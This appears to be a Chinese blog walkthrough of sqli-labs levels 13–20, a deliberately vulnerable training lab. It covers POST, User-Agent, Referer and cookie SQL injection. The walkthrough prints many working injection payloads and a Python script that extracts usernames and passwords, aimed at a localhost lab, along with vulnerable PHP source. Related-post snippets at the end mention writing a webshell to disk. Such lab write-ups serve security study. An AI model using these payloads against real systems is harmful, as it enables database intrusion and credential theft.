sqli-labs less13-20(各種post型頭部注入)

阿新 • • 發佈：2020-12-09

less-13 POST型雙查詢注入

less-14 POST型雙查詢注入

less-15 POST型布林注入

less-16 POST型布林注入

less-17 POST型報錯注入(updatexml)

less-18 POST型user-agent注入

less-19 POST型referer注入

less-20 POST型cookie注入

less-13

POST型雙查詢注入

過程：

判斷欄位型別，判斷欄位個數

') or 1=1#
') or 1=1 order by 2#

雙查詢注入

') union select count(), concat(database(), "--", floor(rand(0)

2)) as a from information_schema.tables group by a #

資料庫知道了爆表名列名得資料一條龍

less-14

POST型雙查詢注入

過程：

與less-13閉合方式不同，less-14用雙引號閉合

" union select count(), concat((select concat(username, "::::::",password) from users limit 1,1), "--", floor(rand(0)2)) as a from information_schema.tables group by a #

less-15

POST型布林注入

過程：

判斷閉合方式
不管輸入什麼頁面變化只有failed和seccessfully

' or 1=1#
" or 1=1#

之後流程跟get型布林盲注流程一樣

less-16

POST型布林注入

過程：

判斷閉合方式

過程跟less-15一樣閉合方式變成')

less-17

POST型報錯注入(updatexml)

原始碼：

function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}
 
		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}
 
		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

學要學習的函式get_magic_quotes_gpc()

當magic_quotes_gpc=On的時候，函式get_magic_quotes_gpc()就會返回1

當magic_quotes_gpc=Off的時候，函式get_magic_quotes_gpc()就會返回0

magic_quotes_gpc函式在php中的作用是判斷解析使用者提示的資料，如包括有：post、get、cookie過來的資料增加轉義字元“\”，以確保這些資料不會引起程式，特別是資料庫語句因為特殊字元引起的汙染而出現致命的錯誤。

在magic_quotes_gpc = On的情況下，如果輸入的資料有

單引號（’）、雙引號（”）、反斜線（\）與 NULL（NULL 字元）等字元都會被加上反斜線。

stripslashes()刪除由 addslashes() 函式新增的反斜槓

ctype_digit()判斷是不是數字，是數字就返回true，否則返回false

mysql_real_escape_string()轉義 SQL 語句中使用的字串中的特殊字元。

intval() 整型轉換

這一關中不能對username下手要從passwordd開始

過程：

17關對username進行了嚴格的過濾

注入的格式：

admin' or updatexml(1, (concat('#',(payload))), 1) #

payload可以換成需要查詢的函式

資料庫名

admin' or updatexml(1, concat('#', database()), 1) #

表名

updatexml(1, concat("#", (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0) #

less-18

POST型user-agent注入

什麼是user-agent

user-agent參考博文

原始碼：

// uagent的接收是未經過嚴格過濾的
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

	{
	// 此處表明我們輸入的uname和passwd是經過後臺嚴格檢驗的，因此想從這裡注入是很難的。
	$uname = check_input($_POST['uname']);
	$passwd = check_input($_POST['passwd']);

	//logging the connection parameters to a file for analysis.	
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Agent:'.$uname."\n");
	
	fclose($fp);
	
	$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
	$result1 = mysql_query($sql);
	$row1 = mysql_fetch_array($result1);
		if($row1)
			{
			echo '<font color= "#FFFF00" font size = 3 >';
			// 這裡有一個插入sql語句，而uagent也沒有嚴格過濾，我們可以從這裡入手注入
			$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
			mysql_query($insert);
			//echo 'Your IP ADDRESS is: ' .$IP;
			echo "</font>";
			//echo "<br>";
			echo '<font color= "#0000ff" font size = 3 >';			
			echo 'Your User Agent is: ' .$uagent;
			echo "</font>";
			echo "<br>";
			print_r(mysql_error());			
			echo "<br><br>";
			echo '<img src="../images/flag.jpg"  />';
			echo "<br>";
			
			}
		else
			{
			echo '<font color= "#0000ff" font size="3">';
			//echo "Try again looser";
			print_r(mysql_error());
			echo "</br>";			
			echo "</br>";
			echo '<img src="../images/slap.jpg"   />';	
			echo "</font>";  
			}

	}

uname和passwd都經過個嚴格過濾，沒有注入點

過程：

輸入

admin admin

看到user-agent的回顯

抓包修改user-agent改為payload

'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

' or updatexml(1, concat('#', (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0), 1, 1) #

' or updatexml(1, concat('#', (select group_concat(username) from users)), 0), 1, 1) #
' or updatexml(1, concat('#', (select group_concat(password) from users)), 0), 1, 1) #

使用python指令碼

import requests
import re


class Header_injection():
    def __init__(self, headers, url):
        self.headers = headers
        self.url = url

    def injection(self):
        # 配置post提交資料
        data = {'uname': 'admin', 'passwd':'admin'}

        for header in self.headers:
            # 構造請求頭
            headers = {
                "User-Agent": header
            }

            # 以post方式提交請求
            response = requests.post(url=url, headers = headers, data=data).text

            # 使用正則表示式對返回HTML進行過濾，得到最終結果
            result = re.search('XPATH syntax error:(.*?)<br>', response)

            # 輸出結果
            print("The answer is %s" % result.group(1))


if __name__ == '__main__':

    headers = [
        "' or updatexml(1, concat('#', database()), 0), 1, 1) #",
        "' or updatexml(1, concat('#', (select group_concat(table_name) from information_schema.tables where table_schema='security')), 0), 1, 1) #",
        "' or updatexml(1, concat('#', (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')), 0), 1, 1) #",
        "' or updatexml(1, concat('#', (select concat(username,':::', password) from users limit 0, 1)), 0), 1, 1) #",
    ]
    url = "http://localhost:7788/sqli/Less-18/"

    h = Header_injection(headers, url)
    h.injection()

less-19

POST型referer注入

什麼是rederer

referer的參考博文

過程：

輸入admin admin有回顯猜測是rederer注入

原始碼：

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
	$result1 = mysql_query($sql);
	$row1 = mysql_fetch_array($result1);
		if($row1)
			{
			echo '<font color= "#FFFF00" font size = 3 >';
			$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
			mysql_query($insert);
			//echo 'Your IP ADDRESS is: ' .$IP;
			echo "</font>";
			//echo "<br>";
			echo '<font color= "#0000ff" font size = 3 >';			
			echo 'Your Referer is: ' .$uagent;
			echo "</font>";
			echo "<br>";
			print_r(mysql_error());			
			echo "<br><br>";
			echo '<img src="../images/flag.jpg" />';
			echo "<br>";
			
			}

' or updatexml(1, concat('#', database()), 0), 1) #
' or updatexml(1, concat('#', (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0), 1) #
' or updatexml(1, concat('#', (select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security")), 0), 1) #
' or updatexml(1, concat('#', (select concat(id, username, password) from users limit 0,1)), 0), 0) #

less-20

POST型cookie注入

cookie是什麼

cookie參考博文

過程：

利用cookie，瀏覽器每次向伺服器傳送請求的時候，如果本地存有相關的cookie資訊，則會將cookie一併傳送給伺服器

通過burp抓包修改cookie值

sqli-labs less13-20(各種post型頭部注入)

less-13 POST型雙查詢注入 less-14 POST型雙查詢注入 less-15 POST型布林注入 less-16 POST型布林注入

sqli-labs less11-12(post型union注入)

less-11 post型union注入過程：輸入admin admin 判斷username password的閉合方式對username查欄位個數

sqli-labs Less7 匯出檔案字元型注入

Less-7 GET - Dump into outfile - String （匯出檔案GET字元型注入）匯出到檔案就是可以將查詢結果匯出到一個檔案中，如常見的將一句話木馬匯出到一個php檔案中，常用的語句是：select “<?php @eval(

sqli-labs lexx25-28a(各種過濾)

less-25AND OR 過濾 less-25a基於Bool_GET_過濾AND/OR_數字型_盲注 less-26過濾了註釋和空格的注入

sqli-labs.less13-18過關記錄

Pass13 和之前pass5、6一樣,用單引號和括號閉合輸入admin\') order by 3#報錯 admin\') order by 2#返回正常

sqli-labs闖關筆記-less2-數字型注入

開啟Less-2中index.php檔案，在第32行$sql=\"SELECT * FROM users WHERE id=\'$id\' LIMIT 0,1\";後面新增如下兩行：

sqli-labs闖關筆記-less38-53-堆疊注入

Stacked injections:堆疊注入。從名詞的含義就可以看到應該是一堆sql語句（多條）一起執行。而在真實的運用中也是這樣的，我們知道在mysql中，主要是命令列中，每一條語句結尾加 ; 表示語句結束。這樣我們就想到了是

Sqli-Labs Less12：POST注入

開啟bp抓包傳送至Repeater，新增 \\ 進行測試根據報錯：222\") 猜測查詢語句： select uname,passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)

sqli-labs 20-22 --cookie注入

異常處理一開始開啟這個題目的時候找不到cookie... 登入成功就是沒有cookie cookie注入沒有cookie...

sqli-labs Less-18/ Less-19 POST-Header Injection

Less-18 POST-Header Injection-Uagent field-Error Based POST方式，頭部 User-Agent: 注入 Less-19 POST-Header Injection-Referer field-Error based POST方式，頭部 Referer: 注入 Less-18 / Less-19 方

sqli-labs第一關:基於錯誤的GET單引號字元型注入

點進去題目：提示我們輸入題目id，第一題，所以我們輸入?id=1，回車即可。如圖:首先可以判斷這裡接受的是一個GET請求，先在1後面加一個’ 發現報錯，說明這裡沒有過濾掉引號，所以這裡是一個注入點 SQL注入

sqli-labs靶場11-12關（基於POST聯合查詢）

1:GET 2:POST 3:Head 4:Put 5:Delete 6:Connect 7:Options 8:Trace 那麼這裡是典型的POST注入，那麼注入點就是在POST資料中，而POST請求往往代表著使用者向伺服器提交了大量的資料請求，行為有包括檔案上傳，

SQLI-LABS Page1 11-20

0x0B Less-11 報錯注入，只是注入方式為POST，可以直接使用報錯函式進行注入，也可以使用常規方法

sqli-labs闖關(11-20)

sqli-labs闖關(11-20) less-11 1、11-20關都為post傳遞，我們可以使用burp抓包來修改post提交的資料。

sqli-labs（11-20）

less-11 本關還可以使用union聯合查詢注入和盲注（1）使用burpsuite抓包，修改引數構造payload。

sqli-labs闖關筆記-less1-20---介面報錯分析

less-1——基於單引號的字元型注入 SELECT * FROM users WHERE id=\'1\'\' LIMIT 0,1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right sy

sqli-labs個人注入心得

閉合方式型別都有一般是’,\",或無閉合符號或 \')，\") Less-1 嘗試?id=1 註釋符號為–+、-- 、#。

sqli-labs學習sql注入

sqli-labs的安裝和配置下載sqli-labs和phpstudy(注意PHP study版本不能高於8.0，不然容易出錯，本人就是PHP study版本高了，一直出錯)

sqli labs less 14

進行了一系列的試探，發現輸入雙引號後報錯，通過這個報錯資訊基本可以確定為雙引號閉合語句。如果不放心，可以在輸入雙引號加括號進行試探。

sqli-labs 18-19 --Header_injection

sqli-labs 18 知識點頭部注入報錯注入使用的函式： updatexml (XML_document, XPath_string, new_value);

sqli-labs less13-20(各種post型頭部注入)

less-13

less-14

less-15

less-16

less-17

less-18

什麼是user-agent

less-19

什麼是rederer

less-20

cookie是什麼

相關推薦